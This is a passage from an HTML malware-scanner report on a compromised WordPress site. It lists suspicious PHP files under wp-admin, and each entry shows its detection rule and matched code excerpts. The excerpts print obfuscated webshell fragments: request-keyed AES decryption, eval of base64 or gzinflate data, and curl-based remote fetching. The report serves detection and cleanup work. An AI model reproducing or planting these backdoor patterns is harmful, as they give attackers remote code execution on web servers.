<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">VUpWl</span><span style="color: #007700">(</span><span style="color: #0000BB">$CwhRi</span><span style="color: #007700">) { </span><span style="color: #0000BB">$PlY </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$miz </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$PlY</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$XEy </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$CwhRi</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$XEy</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$PlY</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$miz</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">VUpWl</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'6/QuCfhaMboAB52sisBUEIVaMjLfpM19aXkr</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$VUpWl</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$VUpWl</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_165").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/user/user/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.86 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:00</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_166" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$pA</span><span style="color: #007700">[</span><span style="color: #0000BB">39</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smpbQWHN</span><span style="color: #007700">(</span><span style="color: #0000BB">$LwsKQb</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ESBzXK </span><span style="color: #007700">= </span><span style="color: #DD0000">"range"</span><span style="color: #007700">; </span><span style="color: #0000BB">$gXWAyEpBlL </span><span style="color: #007700">= </span><span style="color: #0000BB">$ESBzXK</span><span style="color: #007700">(</span><span style="color: #DD0000">"~"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">); </span><span style="color: #0000BB">$JP </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"*"</span><span style="color: #007700">, </span><span style="color: #0000BB">$LwsKQb</span><span style="color: #007700">); </span><span style="color: #0000BB">$yAuEVC </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">; foreach (</span><span style="color: #0000BB">$JP </span><span style="color: #007700">as </span><span style="color: #0000BB">$YqNx </span><span style="color: #007700">=> </span><span style="color: #0000BB">$MR</span><span style="color: #007700">) </span><span style="color: #0000BB">$yAuEVC </span><span style="color: #007700">.= </span><span style="color: #0000BB">$gXWAyEpBlL</span><span style="color: #007700">[</span><span style="color: #0000BB">$MR </span><span style="color: #007700">- </span><span style="color: #0000BB">54442</span><span style="color: #007700">]; return </span><span style="color: #0000BB">$yAuEVC</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">AEnftzGyv</span><span style="color: #007700">(</span><span style="color: #0000BB">$ympRsBh</span><span style="color: #007700">, </span><span style="color: #0000BB">$wLAeZnphix</span><span style="color: #007700">) { </span><span style="color: #0000BB">$RfKQX</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">$NHesjywF </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$RfKQX</span><span style="color: #007700">); return empty(</span><span style="color: #0000BB">$NHesjywF</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$wLAeZnphix</span><span style="color: #007700">(</span><span style="color: #0000BB">$ympRsBh</span><span style="color: #007700">) : </span><span style="color: #0000BB">$NHesjywF</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">RVhtcB</span><span style="color: #007700">() { </span><span style="color: #0000BB">$RLgXn </span><span style="color: #007700">= array(</span><span style="color: #DD0000">"54469*54454*54467*54471*54452*54467*54473*54466*54451*54458*54469*54452*54463*54457*54458"</span><span style="color: #007700">,</span><span style="color: #DD0000">"54453*54452*5445</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silenced_eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@eval(</span><span style="color: #0000BB">$aRC</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">+</span><span style="color: #0000BB">0</span><span style="color: #007700">](</span><span style="color: #0000BB">$Flv</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$pA</span><span style="color: #007700">[</span><span style="color: #0000BB">61</span><span style="color: #007700">](${</span><span style="color: #0000BB">$pA</span><span style="color: #007700">[</span><span style="color: #0000BB">39</span><span style="color: #007700">]}[</span><span style="color: #0000BB">27</span><span style="color: #007700">])); } </span><span style="color: #0000BB">metaphone</span><span style="color: #007700">(</span><span style="color: #DD0000">"9QiZ6Z6773cAo5SHMuQ+8EtMI9WRa/y479yxpGG0jHc"</span><span style="color: #007700">); class </span><span style="color: #0000BB">mg</span><span style="color: #007700">{ static function </span><span style="color: #0000BB">smpbQWHN</span><span style="color: #007700">(</span><span style="color: #0000BB">$LwsKQb</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ESBzXK </span><span style="color: #007700">= </span><span style="color: #DD0000">"r"</span><span style="color: #007700">.</span><span style="color: #DD0000">"a"</span><span style="color: #007700">.</span><span style="color: #DD0000">"n"</span><span style="color: #007700">.</span><span style="color: #DD0000">"g"</span><span style="color: #007700">.</span><span style="color: #DD0000">"e"</span><span style="color: #007700">; </span><span style="color: #0000BB">$gXWAyEpBlL </span><span style="color: #007700">= </span><span style="color: #0000BB">$ESBzXK</span><span style="color: #007700">(</span><span style="color: #DD0000">"~"</span><span style="color: #007700">, </span><span style="color: #DD0000">" "</span><span style="color: #007700">); </span><span style="color: #0000BB">$JP </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"*"</span><span style="color: #007700">, </span><span style="color: #0000BB">$LwsKQb</span><span style="color: #007700">); </span><span style="color: #0000BB">$yAuEVC </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">; foreach (</span><span style="color: #0000BB">$JP </span><span style="color: #007700">as </span><span style="color: #0000BB">$YqNx </span><span style="color: #007700">=> </span><span style="color: #0000BB">$MR</span><span style="color: #007700">) </span><span style="color: #0000BB">$yAuEVC </span><span style="color: #007700">.= </span><span style="color: #0000BB">$gXWAyEpBlL</span><span style="color: #007700">[</span><span style="color: #0000BB">$MR </span><span style="color: #007700">- </span><span style="color: #0000BB">54442</span><span style="color: #007700">]; return </span><span style="color: #0000BB">$yAuEVC</span><span style="color: #007700">; } static function </span><span style="color: #0000BB">AEnftzGyv</span><span style="color: #007700">(</span><span style="color: #0000BB">$ympRsBh</span><span style="color: #007700">, </span><span style="color: #0000BB">$wLAeZnphix</span><span style="color: #007700">) { </span><span style="color: #0000BB">$RfKQX </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(</span><span style="color: #0000BB">$ympRsBh</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$RfKQX</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">$NHesjywF </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$RfKQX</span><span style="color: #007700">); return </span><span style="color: #0000BB">empt</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_166").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/D8aRJH6xdog.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 22:05:15</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_167" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_167").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/o3GVnEycmwI.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.97 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_168" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIGqBEpWjyr30jbf/hv5cD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($YoKrR($icyYU('</span><span style="color: #0000BB">VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk</span><span style="color: #007700">+</span><span style="color: #0000BB">YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$YoKrR</span><span style="color: #007700">(</span><span style="color: #0000BB">$icyYU</span><span style="color: #007700">(</span><span style="color: #DD0000">'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsRblpfVPrHzPpcBlEUGR9PDHkGJ8FwKFN9VTI4pTkiMTHbW3jPsNW8NvpfVTq6nJ5zoTS0MFumqJWmqUVbWk+YPNNNNNNNNNcRaqrX41PoEJRrM3DuX0hKlwya3sjb52uy5hUUED8ZOI0O2zKesTsigJkM1MD3aYKG//mK/39V//3iZ0VtWVY/39rss5/uNbS/C6K+ssrsh/ed/77Z0z+Wb/8clajhla8/6cZ8i9BR5kHWIihiv3Hq/xbMcovfvgNptcIJBKgfbCGc4FfiyLF0ZVIQ9mz4FPBeuzt4kyXXw0Qs/AT4AZbVYYZ1jsM6LJarEbc+P+q+T0moPvG1WrYBvcONSkrBv0176x+mvegyS6Jr6TyOrHr+EaeHMhSVKvLz+yqlkWbsWNocZgHfzo2pUbuKhd4JDH79ychKzeIG...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_168").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/maint/maint/maint/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_169" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'8TO2LyA/XcEB4bH6WDpTaFSKpMeJXnXB3pve7jj345bP/wzN89HBs8sDm9P1+5Dv0Az0LHc5RHtnvh27W5FdvF7GUXKdnni9+xxHezmj3/9XHs+Ne8iXu4t7m613u8xlaw1CdvGvd6Xa86ojPl/lZyIj1nGn9eXsl1/++ysjyofuxMaVSoNoV8KJcXzc5cSP9nNf+H6Vzi+/iVODRgeR9cRtuVGs8NYsMUg3I7CIIKrY3xTb1V+3rqsfYbnpkuy/Byc+UmQFKOZHcnDIMpF3AFYYgcwywRikjJhxztbZGWB2XxJh7p4/Sw6QEz65GCDUiio07n4ufUbvZB9kd1bf8XP0qBa+22zP36G/OSltalqX3Rmga06t4tRtctZfRm85I//jx78nb36lz/+bnFDrLaCRxaQ1d1UbJuedaFtTsvanOhUvHTBjbp++bi6n6v3HeGaHRfFkbNqgMkgHbPKGI6sN+qPK42ZEPm3r4J8ztwrJGYNpTnd...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">HKAW</span><span style="color: #007700">(</span><span style="color: #0000BB">$yzh</span><span style="color: #007700">) { </span><span style="color: #0000BB">$Cki </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$flW </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$Cki</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$PNF </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$yzh</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$PNF</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$Cki</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$flW</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">HKAW</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'7az3aF26clHu7HBQ7VVmesXLbZKAEhk4aBbGZlGUtT</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$HKAW</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$HKAW</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_169").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-admin/maint/maint/maint/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_170" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$Bbx_BvPFWi</span><span style="color: #007700">[</span><span style="color: #0000BB">48</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wDttT3Cblp</span><span style="color: #007700">(</span><span style="color: #0000BB">$Bmw5bv4Mi7</span><span style="color: #007700">) { goto </span><span style="color: #0000BB">mO2V2U2tQp</span><span style="color: #007700">; </span><span style="color: #0000BB">mO2V2U2tQp</span><span style="color: #007700">: </span><span style="color: #0000BB">$UxXdwl8Pe0 </span><span style="color: #007700">= </span><span style="color: #DD0000">"range"</span><span style="color: #007700">; goto </span><span style="color: #0000BB">mBCA79a8QM</span><span style="color: #007700">; </span><span style="color: #0000BB">Sjikp8SbVB</span><span style="color: #007700">: return </span><span style="color: #0000BB">$t3ttnCiI9J</span><span style="color: #007700">; goto </span><span style="color: #0000BB">jkF3On5PQx</span><span style="color: #007700">; </span><span style="color: #0000BB">dpwufqeMJG</span><span style="color: #007700">: foreach (</span><span style="color: #0000BB">$qah3hx01LN </span><span style="color: #007700">as </span><span style="color: #0000BB">$e5Z9VdqU62 </span><span style="color: #007700">=> </span><span style="color: #0000BB">$ON1Y5B4UTr</span><span style="color: #007700">) { </span><span style="color: #0000BB">$t3ttnCiI9J </span><span style="color: #007700">.= </span><span style="color: #0000BB">$z97ANP_O3V</span><span style="color: #007700">[</span><span style="color: #0000BB">$ON1Y5B4UTr </span><span style="color: #007700">- </span><span style="color: #0000BB">87721</span><span style="color: #007700">];</span>
</span>
